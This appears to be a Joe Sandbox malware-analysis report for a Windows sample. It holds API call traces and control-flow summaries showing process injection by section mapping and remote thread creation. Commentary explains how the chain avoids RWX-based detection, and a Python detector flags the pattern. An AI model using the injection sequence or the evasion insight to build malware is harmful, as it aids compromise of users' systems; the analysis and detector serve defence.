• Sleep.KERNELBASE(00001388), ref: 00401A31
  • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
  • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
Memory Dump Source
• Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_35DB.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0

Strings
Memory Dump Source
• Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_35DB.jbxd
Similarity
• API ID:
• String ID: s
• API String ID: 0-453955339
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d21c630cb6501ad70d911e8ac2028ca453459510ec33b2a00306ff3c301efda3
                                                                                                                                        • Instruction ID: 6725721ff3489d431dd836171e340eb16c8ebd58ca09b28f7b875ac3b9798d56
                                                                                                                                        • Opcode Fuzzy Hash: d21c630cb6501ad70d911e8ac2028ca453459510ec33b2a00306ff3c301efda3
                                                                                                                                        • Instruction Fuzzy Hash: 43F0273A30669697DB135E7CD0009CCFF10FD6B6207B88BD2D0C09A141C222845BCB90

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:10.9%
                                                                                                                                        Dynamic/Decrypted Code Coverage:32.7%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:147
                                                                                                                                        Total number of Limit Nodes:6
                                                                                                                                        execution_graph 3386 4019c0 3387 4019c8 3386->3387 3388 4019e7 3386->3388 3389 401a29 Sleep 3388->3389 3390 4014fb 7 API calls 3389->3390 3391 401a44 3390->3391 3392 4015fb 7 API calls 3391->3392 3393 401a55 3391->3393 3392->3393 3330 402f42 3332 402f18 3330->3332 3331 4019e0 15 API calls 3333 40304f 3331->3333 3332->3331 3332->3333 3346 403103 3347 403246 3346->3347 3348 40312d 3346->3348 3348->3347 3349 4031f0 RtlCreateUserThread NtTerminateProcess 3348->3349 3349->3347 3187 1fa003c 3188 1fa0049 3187->3188 3200 1fa0e0f SetErrorMode SetErrorMode 3188->3200 3193 1fa0265 3194 1fa02ce VirtualProtect 3193->3194 3196 1fa030b 3194->3196 3195 1fa0439 VirtualFree 3199 1fa04be LoadLibraryA 3195->3199 3196->3195 3198 1fa08c7 3199->3198 3201 1fa0223 3200->3201 3202 1fa0d90 3201->3202 3203 1fa0dad 3202->3203 3204 1fa0dbb GetPEB 3203->3204 3205 1fa0238 VirtualAlloc 3203->3205 3204->3205 3205->3193 3264 401606 3264->3264 3265 401609 3264->3265 3266 4016af NtDuplicateObject 3265->3266 3275 4017cb 3265->3275 3267 4016cc NtCreateSection 3266->3267 3266->3275 3268 4016f2 NtMapViewOfSection 3267->3268 3269 40174c NtCreateSection 3267->3269 3268->3269 3270 401715 NtMapViewOfSection 3268->3270 3271 401778 3269->3271 3269->3275 3270->3269 3272 401733 3270->3272 3273 401782 NtMapViewOfSection 3271->3273 3271->3275 3272->3269 3274 4017a9 NtMapViewOfSection 3273->3274 3273->3275 3274->3275 3276 401613 3277 40161c 3276->3277 3278 4016af NtDuplicateObject 3277->3278 3287 4017cb 3277->3287 3279 4016cc NtCreateSection 3278->3279 3278->3287 3280 4016f2 NtMapViewOfSection 3279->3280 3281 40174c NtCreateSection 3279->3281 3280->3281 3282 401715 NtMapViewOfSection 3280->3282 3283 401778 3281->3283 3281->3287 3282->3281 3284 401733 3282->3284 3285 401782 NtMapViewOfSection 3283->3285 3283->3287 3284->3281 3286 4017a9 NtMapViewOfSection 3285->3286 3285->3287 
3286->3287 3206 403257 3207 4031f0 RtlCreateUserThread NtTerminateProcess 3206->3207 3209 403261 3206->3209 3208 403246 3207->3208 3209->3209 3314 402ed9 3316 402e8d 3314->3316 3315 4019e0 15 API calls 3317 40304f 3315->3317 3316->3314 3316->3315 3316->3317 3394 4019eb 3395 4019f0 3394->3395 3396 401a29 Sleep 3395->3396 3397 4014fb 7 API calls 3396->3397 3398 401a44 3397->3398 3399 4015fb 7 API calls 3398->3399 3400 401a55 3398->3400 3399->3400 3172 4b1bfd 3173 4b1c0c 3172->3173 3176 4b239d 3173->3176 3181 4b23b8 3176->3181 3177 4b23c1 CreateToolhelp32Snapshot 3178 4b23dd Module32First 3177->3178 3177->3181 3179 4b23ec 3178->3179 3182 4b1c15 3178->3182 3183 4b205c 3179->3183 3181->3177 3181->3178 3184 4b2087 3183->3184 3185 4b2098 VirtualAlloc 3184->3185 3186 4b20d0 3184->3186 3185->3186 3186->3186 3318 4014fa 3328 40150c 3318->3328 3319 4016af NtDuplicateObject 3320 4016cc NtCreateSection 3319->3320 3329 4015ea 3319->3329 3321 4016f2 NtMapViewOfSection 3320->3321 3322 40174c NtCreateSection 3320->3322 3321->3322 3323 401715 NtMapViewOfSection 3321->3323 3324 401778 3322->3324 3322->3329 3323->3322 3325 401733 3323->3325 3326 401782 NtMapViewOfSection 3324->3326 3324->3329 3325->3322 3327 4017a9 NtMapViewOfSection 3326->3327 3326->3329 3327->3329 3328->3319 3328->3329 3424 1fa0001 3425 1fa0005 3424->3425 3430 1fa092b GetPEB 3425->3430 3427 1fa0030 3432 1fa003c 3427->3432 3431 1fa0972 3430->3431 3431->3427 3433 1fa0049 3432->3433 3434 1fa0e0f 2 API calls 3433->3434 3435 1fa0223 3434->3435 3436 1fa0d90 GetPEB 3435->3436 3437 1fa0238 VirtualAlloc 3436->3437 3438 1fa0265 3437->3438 3439 1fa02ce VirtualProtect 3438->3439 3441 1fa030b 3439->3441 3440 1fa0439 VirtualFree 3444 1fa04be LoadLibraryA 3440->3444 3441->3440 3443 1fa08c7 3444->3443 3210 402fbe 3212 402fc3 3210->3212 3213 40304f 3212->3213 3214 4019e0 3212->3214 3215 4019e7 3214->3215 3216 401a29 Sleep 3215->3216 3221 4014fb 3216->3221 3218 401a44 3220 401a55 3218->3220 3233 4015fb 3218->3233 3220->3213 3222 
40150c 3221->3222 3223 4016af NtDuplicateObject 3222->3223 3232 4015ea 3222->3232 3224 4016cc NtCreateSection 3223->3224 3223->3232 3225 4016f2 NtMapViewOfSection 3224->3225 3226 40174c NtCreateSection 3224->3226 3225->3226 3227 401715 NtMapViewOfSection 3225->3227 3228 401778 3226->3228 3226->3232 3227->3226 3229 401733 3227->3229 3230 401782 NtMapViewOfSection 3228->3230 3228->3232 3229->3226 3231 4017a9 NtMapViewOfSection 3230->3231 3230->3232 3231->3232 3232->3218 3234 40160b 3233->3234 3235 4016af NtDuplicateObject 3234->3235 3242 4017cb 3234->3242 3236 4016cc NtCreateSection 3235->3236 3235->3242 3237 4016f2 NtMapViewOfSection 3236->3237 3238 40174c NtCreateSection 3236->3238 3237->3238 3239 401715 NtMapViewOfSection 3237->3239 3240 401778 3238->3240 3238->3242 3239->3238 3241 401733 3239->3241 3240->3242 3243 401782 NtMapViewOfSection 3240->3243 3241->3238 3242->3220 3243->3242 3244 4017a9 NtMapViewOfSection 3243->3244 3244->3242 3445 1fa0005 3446 1fa092b GetPEB 3445->3446 3447 1fa0030 3446->3447 3448 1fa003c 7 API calls 3447->3448 3449 1fa0038 3448->3449

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 85 4014fb-401504 86 40151b 85->86 87 40150c-40152e 85->87 86->87 92 401531-401545 call 40127e 87->92 97 40154a-401555 92->97 97->97 98 401558-40155a 97->98 99 40155d-401572 98->99 102 401574-401579 99->102 104 4015c4 102->104 105 40157b 102->105 106 4015c6 104->106 107 40162f-401632 104->107 108 4015f6-4015f8 105->108 109 40157d-40159a 105->109 106->102 110 4015c8-4015cd 106->110 111 401634-401659 call 40127e 107->111 112 4016a5-4016a6 107->112 119 40159d 109->119 120 40152f-401530 109->120 115 401648-401659 110->115 116 4015cf-4015d0 110->116 126 40165b 111->126 127 40165e-401663 111->127 117 4016a7-4016a9 112->117 118 40162d 112->118 115->126 115->127 124 4015d2-4015e8 116->124 125 4015b6-4015b9 116->125 122 401987 117->122 123 4016af-4016c6 NtDuplicateObject 117->123 118->107 119->99 128 40159f-4015a1 119->128 120->92 129 401996-4019dd call 40127e 122->129 123->122 131 4016cc-4016f0 NtCreateSection 123->131 133 4015ea-4015f5 124->133 134 40157c 124->134 125->111 130 4015bb-4015c3 125->130 126->127 148 401989-401991 127->148 149 401669-40167a 127->149 135 4015a3 128->135 136 40161c 128->136 130->104 138 4016f2-401713 NtMapViewOfSection 131->138 139 40174c-401772 NtCreateSection 131->139 133->108 134->109 141 4015a9-4015b4 134->141 143 40161e-40162c 135->143 144 4015a5-4015a6 135->144 136->143 138->139 146 401715-401731 NtMapViewOfSection 138->146 139->122 147 401778-40177c 139->147 141->125 143->111 152 401643 143->152 144->141 146->139 153 401733-401749 146->153 147->122 154 401782-4017a3 NtMapViewOfSection 147->154 148->127 148->129 149->122 162 401680-4016a3 149->162 152->111 153->139 154->122 156 4017a9-4017c5 NtMapViewOfSection 154->156 156->122 161 4017cb call 4017d0 156->161 162->117
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                                                                                        • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                                                                                                        • Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                                                                                        • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 171 4015fb-401604 172 401615 171->172 173 40160b-401611 171->173 172->173 174 401618-40162c 172->174 173->174 178 401643 174->178 179 401634-401659 call 40127e 174->179 178->179 184 40165b 179->184 185 40165e-401663 179->185 184->185 187 401989-401991 185->187 188 401669-40167a 185->188 187->185 191 401996-4019dd call 40127e 187->191 192 401680-4016a9 188->192 193 401987 188->193 192->193 200 4016af-4016c6 NtDuplicateObject 192->200 193->191 200->193 202 4016cc-4016f0 NtCreateSection 200->202 204 4016f2-401713 NtMapViewOfSection 202->204 205 40174c-401772 NtCreateSection 202->205 204->205 207 401715-401731 NtMapViewOfSection 204->207 205->193 208 401778-40177c 205->208 207->205 210 401733-401749 207->210 208->193 212 401782-4017a3 NtMapViewOfSection 208->212 210->205 212->193 214 4017a9-4017c5 NtMapViewOfSection 212->214 214->193 217 4017cb call 4017d0 214->217
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
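Read against the documented prototypes, the seven calls above are a section-mapping injection chain rather than the more common VirtualAllocEx/WriteProcessMemory one: NtCreateSection is called twice with FileHandle = 0 and AllocationAttributes = 08000000 (SEC_COMMIT, i.e. a pagefile-backed section), first with SectionPageProtection 00000004 (PAGE_READWRITE) and then with 00000040 (PAGE_EXECUTE_READWRITE) and DesiredAccess 0000000E (SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE). Each section is then mapped twice with NtMapViewOfSection: once into the current process (ProcessHandle shown as 000000FF, the report's rendering of the NtCurrentProcess pseudo-handle) as a writable view, and once into a foreign process handle the sandbox could not resolve (shown as ?). The second remote view is mapped with Win32Protect 00000020 (PAGE_EXECUTE_READ), so the target process never holds an RWX region even though the writer side does; a hunt that only looks for RWX allocations in explorer.exe would miss it. The following parser and detector are an added example, not code from the Joe Sandbox report: it takes API lines in the report's own "Name.Module(args), ref: addr" format (the sample is the seven lines above, embedded as constructed input), decodes the argument positions by prototype, and flags a create-section / local-writable-view / foreign-process-view sequence. The treatment of 000000FF as the current-process pseudo-handle and of any other handle value as foreign is an assumption about the report's rendering, stated in the code.

```python
import re

# Constructed sample input: the seven calls from the "APIs" list above, in the
# report's "Name.Module(args), ref: addr" format (extra trailing stack slots kept).
SAMPLE_LOG = """\
NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
"""

SEC_COMMIT = 0x08000000
# PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
PAGE_WRITE_BITS = 0x04 | 0x08 | 0x40 | 0x80
# PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
PAGE_EXEC_BITS = 0x10 | 0x20 | 0x40 | 0x80
# Assumption: the report prints NtCurrentProcess() (-1) as 000000FF; accept the full form too.
CURRENT_PROCESS = {0xFF, 0xFFFFFFFF}

LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>Nt\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def _arg(tok):
    """Hex argument as int, or None for '?' (a runtime value the sandbox could not resolve)."""
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_calls(text):
    """Turn report API lines into dicts with the API name, positional args and call site."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            calls.append({
                "api": m.group("api"),
                "args": [_arg(t) for t in m.group("args").split(",")],
                "ref": int(m.group("ref"), 16),
            })
    return calls


def detect_section_injection(calls):
    """Flag NtCreateSection -> local writable view -> foreign-process view chains.

    Positions follow the documented prototypes; the report appends extra stack
    slots after the real parameters, which are ignored:
      NtCreateSection(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize,
                      SectionPageProtection, AllocationAttributes, FileHandle)
      NtMapViewOfSection(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize,
                         SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect)
    """
    findings = []
    section = None  # state for the most recently created pagefile-backed section
    for c in calls:
        a = c["args"]
        if c["api"] == "NtCreateSection" and len(a) >= 7:
            prot, alloc, file_handle = a[4], a[5], a[6]
            if file_handle == 0 and prot is not None and alloc is not None and alloc & SEC_COMMIT:
                section = {"created_at": c["ref"],
                           "executable": bool(prot & PAGE_EXEC_BITS),
                           "local_rw": None}
            else:
                section = None
        elif c["api"] == "NtMapViewOfSection" and section is not None and len(a) >= 10:
            proc, prot = a[1], a[9]
            if prot is None:
                continue
            if proc in CURRENT_PROCESS:
                if prot & PAGE_WRITE_BITS:
                    section["local_rw"] = c["ref"]
            elif section["local_rw"] is not None:
                # Assumption: any handle that is not the current-process pseudo-handle
                # (including one the report shows as '?') is a foreign process.
                remote_exec = bool(prot & PAGE_EXEC_BITS)
                findings.append({
                    # Executable section mapped executable into another process: high.
                    # Data section shared writable with another process: medium (staging).
                    "severity": "high" if (remote_exec and section["executable"]) else "medium",
                    "section_created_at": section["created_at"],
                    "local_view_at": section["local_rw"],
                    "remote_view_at": c["ref"],
                    "remote_protect": prot,
                })
    return findings


if __name__ == "__main__":
    for f in detect_section_injection(parse_calls(SAMPLE_LOG)):
        print({k: (hex(v) if isinstance(v, int) else v) for k, v in f.items()})
```

On the sample this yields two findings: a medium one for the PAGE_READWRITE section shared with the foreign process at 0040172C (the staging buffer), and a high one for the PAGE_EXECUTE_READWRITE section created at 0040176D, written locally at 0040179E and mapped PAGE_EXECUTE_READ into the other process at 004017C0. The detector keys on the create/map pairing and the handle asymmetry, not on RWX in the target, which is the caveat the 00000020 protection on the last call illustrates.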
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                                        • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                                                                                                        • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                                        • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 219 401613-40162c 223 401643 219->223 224 401634-401659 call 40127e 219->224 223->224 229 40165b 224->229 230 40165e-401663 224->230 229->230 232 401989-401991 230->232 233 401669-40167a 230->233 232->230 236 401996-4019dd call 40127e 232->236 237 401680-4016a9 233->237 238 401987 233->238 237->238 245 4016af-4016c6 NtDuplicateObject 237->245 238->236 245->238 247 4016cc-4016f0 NtCreateSection 245->247 249 4016f2-401713 NtMapViewOfSection 247->249 250 40174c-401772 NtCreateSection 247->250 249->250 252 401715-401731 NtMapViewOfSection 249->252 250->238 253 401778-40177c 250->253 252->250 255 401733-401749 252->255 253->238 257 401782-4017a3 NtMapViewOfSection 253->257 255->250 257->238 259 4017a9-4017c5 NtMapViewOfSection 257->259 259->238 262 4017cb call 4017d0 259->262
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                                        • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                                                                                                        • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                                        • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 264 401606-401607 264->264 265 401609 264->265 266 40160b-40162c 265->266 267 40163c-401659 call 40127e 265->267 277 401643 266->277 278 401634-401639 266->278 275 40165b 267->275 276 40165e-401663 267->276 275->276 280 401989-401991 276->280 281 401669-40167a 276->281 277->278 278->267 280->276 284 401996-4019dd call 40127e 280->284 285 401680-4016a9 281->285 286 401987 281->286 285->286 293 4016af-4016c6 NtDuplicateObject 285->293 286->284 293->286 295 4016cc-4016f0 NtCreateSection 293->295 297 4016f2-401713 NtMapViewOfSection 295->297 298 40174c-401772 NtCreateSection 295->298 297->298 300 401715-401731 NtMapViewOfSection 297->300 298->286 301 401778-40177c 298->301 300->298 303 401733-401749 300->303 301->286 305 401782-4017a3 NtMapViewOfSection 301->305 303->298 305->286 307 4017a9-4017c5 NtMapViewOfSection 305->307 307->286 310 4017cb call 4017d0 307->310
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1652636561-0
                                                                                                                                        • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                                        • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                                                                                                        • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                                        • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
Control-flow graph (rendered as an image in the original report; only its summary survives extraction): function entry 00401627, basic blocks 401627-4019dd, with calls to NtDuplicateObject, NtCreateSection and NtMapViewOfSection.
APIs
• NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
Memory Dump Source
• Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
• Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
• Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
• Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

Control-flow Graph
Control-flow graph (rendered as an image in the original report; only its summary survives extraction): function entry 00401641, basic blocks 401641-4019dd, with calls to NtDuplicateObject, NtCreateSection and NtMapViewOfSection.
APIs
• NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
Memory Dump Source
• Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
• Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
• Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
• Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

Control-flow Graph
Control-flow graph (rendered as an image in the original report; only its summary survives extraction): function entry 00403103, basic blocks 403103-40324b, with calls to RtlCreateUserThread and NtTerminateProcess.
APIs
Memory Dump Source
• Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
Similarity
• API ID: CreateProcessTerminateThreadUser
• String ID:
• API String ID: 1921587553-0
• Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
• Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
• Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
• Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

Control-flow Graph
Control-flow graph (rendered as an image in the original report; only its summary survives extraction): function entry 00403257, basic blocks 4031f0-4032be, with calls to RtlCreateUserThread and NtTerminateProcess.
APIs
Memory Dump Source
• Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
Similarity
• API ID: CreateProcessTerminateThreadUser
• String ID:
• API String ID: 1921587553-0
• Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
• Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
